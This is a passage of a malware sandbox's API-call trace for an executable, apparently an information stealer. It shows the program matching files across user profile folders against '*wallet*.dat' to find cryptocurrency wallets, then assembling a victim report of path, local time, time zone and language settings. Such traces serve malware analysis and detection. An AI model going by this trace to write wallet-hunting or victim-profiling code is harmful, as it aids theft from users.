dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", cAlternateFileName="TM0283~1.DOC")) returned 1 [0207.610] PathMatchSpecA (pszFile="TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx", pszSpec="*wallet*.dat") returned 0 [0207.610] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980cc2bb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980cc2bb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980cc2bb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb8c0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.610] FindNextFileA (in: hFindFile=0x5e7808, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98167377, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98167377, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98167377, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x866f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03998158[[fn=Element]].dotx", cAlternateFileName="TM0399~1.DOT")) returned 1 [0207.610] PathMatchSpecA (pszFile="TM03998158[[fn=Element]].dotx", pszSpec="*wallet*.dat") returned 0 [0207.610] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998158[[fn=Element]].dotx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98167377, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98167377, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98167377, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x866f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.610] FindNextFileA (in: hFindFile=0x5e7808, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03998159[[fn=Insight]].dotx", cAlternateFileName="TM0399~2.DOT")) returned 1 [0207.610] PathMatchSpecA (pszFile="TM03998159[[fn=Insight]].dotx", pszSpec="*wallet*.dat") returned 0 [0207.610] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM03998159[[fn=Insight]].dotx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9846e6c1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9846e6c1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f3b86, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x34df74, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.612] PathMatchSpecA (pszFile="User", pszSpec="*wallet*.dat") returned 0 [0207.615] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0207.615] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.616] PathMatchSpecA (pszFile="SmartArt Graphics", pszSpec="*wallet*.dat") returned 0 [0207.616] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.620] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0207.620] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0207.620] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.620] PathMatchSpecA (pszFile="Normal.dotm", pszSpec="*wallet*.dat") returned 0 [0207.621] PathMatchSpecA (pszFile="Vault", pszSpec="*wallet*.dat") returned 0 [0207.621] PathMatchSpecA (pszFile="Windows", pszSpec="*wallet*.dat") returned 0 [0207.621] PathMatchSpecA (pszFile="AccountPictures", pszSpec="*wallet*.dat") returned 0 [0207.621] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0207.621] PathMatchSpecA (pszFile="Libraries", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="CameraRoll.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="Documents.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="Music.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="Pictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.704] PathMatchSpecA (pszFile="SavedPictures.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.705] PathMatchSpecA (pszFile="Videos.library-ms", pszSpec="*wallet*.dat") returned 0 [0207.706] PathMatchSpecA (pszFile="Network Shortcuts", pszSpec="*wallet*.dat") returned 0 [0207.706] PathMatchSpecA (pszFile="Printer Shortcuts", pszSpec="*wallet*.dat") returned 0 [0207.706] PathMatchSpecA (pszFile="Recent", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-BmJ TIETLt8hPGHr9.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-eU58rvaW-e3IO_v.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-JCtBTWbrbFcPF0tbyjJ.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-lMHybX2GL15jCBM8X.flv.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-WCP.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="-_dwXe8Ne_CO.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="1rcNtno2kCm17hk JfJ.lnk", pszSpec="*wallet*.dat") returned 0 [0207.707] PathMatchSpecA (pszFile="1XmJAb_Q60F39o_mOaE.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="2iRNh7.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="32uPs3ZIWx _e.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="3zCj9GZKe1AZa.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="4EPr7E2szW2G.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="4hlZxLIpNg2N3doPY.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="4KI_98ckf29JwFsXBff.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="4lV2AK8.lnk", pszSpec="*wallet*.dat") returned 0 [0207.708] PathMatchSpecA (pszFile="4RajgfsE_A1k.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="5bs0Nw2 TCetzVpzgjO.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="5qOu_kalMvxIhF6Gk795.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="5sJ8NhtteN.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="5wsdixcF.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="5yIBSDU0r.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="64GH_t.lnk", pszSpec="*wallet*.dat") returned 0 [0207.709] PathMatchSpecA (pszFile="6be7A.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="6F8MUNq2U.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="6ViKiFEOwO5swuah.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="6wxduD.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="7Cxxp0kKfXp.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="7LFWlPf6_byLyfP3.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="8CF2IAJD3S0tcL4b1eZY.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="8Wg7-ShBXIqlH.lnk", pszSpec="*wallet*.dat") returned 0 [0207.710] PathMatchSpecA (pszFile="A1YJCImiwxYM5us-tJ.lnk", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="a4CMMS7kYnOhib_.lnk", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="Am1F7ighvADX.lnk", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="ApYBqji85v6HKZFSu.lnk", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="ArvItNgjydzdIxIrqtM.lnk", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="AutomaticDestinations", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="5f7b5f1e01b83767.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.711] PathMatchSpecA (pszFile="7e4dca80246863e3.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="9d1f905ce5044aee.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="f01b4d95cf55d32a.automaticDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="avxAejd3U U5M.lnk", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="AZbMEEMj72-FtG452eBv.lnk", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="aZQAipL-OBgS.lnk", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="a_6t.lnk", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="b42m.lnk", pszSpec="*wallet*.dat") returned 0 [0207.712] PathMatchSpecA (pszFile="bSnzZ99JFZoji.lnk", pszSpec="*wallet*.dat") returned 0 [0207.713] PathMatchSpecA (pszFile="btUOHOhFO2.lnk", pszSpec="*wallet*.dat") returned 0 [0207.713] PathMatchSpecA (pszFile="C-wm-g6 5rMPJbFi.lnk", pszSpec="*wallet*.dat") returned 0 [0207.713] PathMatchSpecA (pszFile="cEkdSu_e3sy.lnk", pszSpec="*wallet*.dat") returned 0 [0207.713] PathMatchSpecA (pszFile="cFkmXqM0p2H6f5HdMl7z.lnk", pszSpec="*wallet*.dat") returned 0 [0207.714] PathMatchSpecA (pszFile="cj_c-.lnk", pszSpec="*wallet*.dat") returned 0 [0207.714] PathMatchSpecA (pszFile="cL_xSgg4.lnk", pszSpec="*wallet*.dat") returned 0 [0207.714] PathMatchSpecA (pszFile="Common Files.lnk", pszSpec="*wallet*.dat") returned 0 [0207.714] PathMatchSpecA (pszFile="crjeF.lnk", pszSpec="*wallet*.dat") returned 0 [0207.714] PathMatchSpecA (pszFile="CustomDestinations", pszSpec="*wallet*.dat") returned 0 [0207.856] PathMatchSpecA (pszFile="6d2bac8f1edf6668.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.856] PathMatchSpecA (pszFile="7e4dca80246863e3.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.856] PathMatchSpecA (pszFile="9d1f905ce5044aee.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.856] PathMatchSpecA (pszFile="f01b4d95cf55d32a.customDestinations-ms", pszSpec="*wallet*.dat") returned 0 [0207.857] PathMatchSpecA (pszFile="cvADWRFCrZ-cOx GY.lnk", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="c_lpd6oIbSN9z.lnk", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="DA_GfYeqeBLn.lnk", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="desktop.ini", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="DwMJ.lnk", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="EbPS3yaCSVQd.lnk", pszSpec="*wallet*.dat") returned 0 [0207.858] PathMatchSpecA (pszFile="eENsnbwfI7D.lnk", pszSpec="*wallet*.dat") returned 0 [0207.866] GetProcessHeap () returned 0x5b0000 [0207.866] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xf423f) returned 0x8e8d020 [0207.870] lstrcatA (in: lpString1="", lpString2="Tag: " | out: lpString1="Tag: ") returned="Tag: " [0207.870] lstrcatA (in: lpString1="Tag: ", lpString2="Default" | out: lpString1="Tag: Default") returned="Tag: Default" [0207.870] lstrcatA (in: lpString1="Tag: Default", lpString2="\n\n" | out: lpString1="Tag: Default\n\n") returned="Tag: Default\n\n" [0207.870] lstrcatA (in: lpString1="Tag: Default\n\n", lpString2="IP: IP?" | out: lpString1="Tag: Default\n\nIP: IP?") returned="Tag: Default\n\nIP: IP?" [0207.870] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\n") returned="Tag: Default\n\nIP: IP?\n" [0207.870] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\n", lpString2="Country: Country?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?" [0207.870] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n" [0207.870] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\n", lpString2="Working Path: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: " [0207.870] GetCurrentProcessId () returned 0x148 [0207.870] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x268 [0207.870] GetModuleFileNameExA (in: hProcess=0x268, hModule=0x0, lpFilename=0x19d520, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0207.871] CloseHandle (hObject=0x268) returned 1 [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: ", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\n" [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\n", lpString2="Local Time: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: " [0207.871] GetProcessHeap () returned 0x5b0000 [0207.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5da1c8 [0207.871] GetLocalTime (in: lpSystemTime=0x19d624 | out: lpSystemTime=0x19d624*(wYear=0x7e5, wMonth=0x9, wDayOfWeek=0x1, wDay=0xd, wHour=0x10, wMinute=0x6, wSecond=0x39, wMilliseconds=0x2d3)) [0207.871] wsprintfA (in: param_1=0x5da1c8, param_2="%d/%d/%d %d:%d:%d" | out: param_1="13/9/2021 16:7:2") returned 16 [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: ", lpString2="13/9/2021 16:7:2" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2" [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\n" [0207.871] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\n", lpString2="TimeZone: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: " [0207.872] GetProcessHeap () returned 0x5b0000 [0207.872] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5dbaf0 [0207.872] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19d584 | out: lpTimeZoneInformation=0x19d584) returned 0x2 [0207.872] wsprintfA (in: param_1=0x5dbaf0, param_2="UTC%d" | out: param_1="UTC1") returned 4 [0207.872] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: ", lpString2="UTC1" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1" [0207.872] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\n" [0207.872] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\n", lpString2="Display Language: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: " [0207.872] GetUserDefaultLocaleName (in: lpLocaleName=0x19d57c, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0207.872] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x60ee70 [0207.977] CharToOemW (in: pSrc="en-US", pDst=0x60ee70 | out: pDst="en-US") returned 1 [0207.977] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: ", lpString2="en-US" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US" [0207.977] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\n" [0207.977] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\n", lpString2="Keyboard Languages: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: " [0207.977] GetProcessHeap () returned 0x5b0000 [0207.977] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1f4) returned 0x5fc500 [0207.977] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0207.978] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x60f010 [0207.978] GetKeyboardLayoutList (in: nBuff=1, lpList=0x60f010 | out: lpList=0x60f010) returned 1 [0207.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2, lpLCData=0x19d42c, cchData=512 | out: lpLCData="English (United States)") returned 24 [0208.034] wsprintfA (in: param_1=0x5fc500, param_2="%s" | out: param_1="English (United States)") returned 23 [0208.034] LocalFree (hMem=0x60f010) returned 0x0 [0208.034] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: 